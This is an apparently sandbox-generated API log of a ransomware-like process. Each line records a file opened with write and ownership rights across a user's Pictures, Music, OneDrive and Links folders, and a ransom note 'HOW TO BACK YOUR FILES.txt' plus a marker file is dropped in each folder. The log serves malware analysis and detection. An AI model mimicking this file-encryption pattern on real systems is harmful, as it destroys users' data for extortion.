Create C:\Users\FD1HVy\Pictures\JHLKfbZ_wnxI.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\jTcjMuk8-c84cV.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\LkpzuM_D0mU.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\M6y8KiMnNaGEd1.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\N0NZDmMYf0H.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\nqh87aP.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\qnFyF6.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\QYkN2xzet.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\rL58t9UpNE.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\sg1EYYvYbFWAigsa.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Sghof7ewON_UNTJ3.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\SJe4.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\snTK_4Hws.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\tbI35.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\ugR0riRG8ulCowNjMAqj.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\xAWhA3CWoiGQ4.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Xs85b.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\YJvAER.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\zkGa22a5xC9Cll9U.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\_gki25reI.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\Saved Pictures\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\Camera Roll\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\OneDrive\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\OneDrive\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\14B5f5HX.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\epqIgxA0WzcL_N3FRi.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\ivAqh4BdXoB0En.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\pKN8kzf02i2Z-2YwQdYf.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\XaND DoJCBA3Xf.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\rsJ9UPU.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\wXxWLXtHA6IWwzbkTvK.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\yxGMwmgC\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\yxGMwmgC\dOlY5mI8x96ejt4.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\yxGMwmgC\hqVpFTG9IIW eeHIf0.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\yxGMwmgC\iyvNor3BCpFxS.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\yxGMwmgC\T4BI1N3Y4nE.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\yxGMwmgC\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\b1MCgDF7JU.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\RZMqfkHjGC7Ywnfi.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\_9r81igxQbjAOcgmhEV.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\2FpKVPISO.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\5pycqsYyh9jtXU4a.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\926rqjMJjcledBP-.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\H9vaiExm-o.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\OUfb1R.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\u3Lej26cURF7pFaUavmI.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\X9wKF.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Ylq3.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\cJ70uWo2V.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\gNF41DnE96kMsiC.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\Z2GhDV1FaIXkNy.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\9oZvTZiqj1T2ND.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\osWp2.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\U_ga_WJrGJ-jDmjIG.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\fRm4zP.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\FSplmPyv3.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\YWaVCyXnxBoBbdx.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\_MbUJDIbnNB86DdwXKQn.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\geOqCbV8uwQiJY9.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\PKDoJjf.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\vRwHl.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\D1biJ0M12k7D5tV.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\FGCqab 6Q9IrvSbP.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\Oddm UVF74ixYdV9S.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Links\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
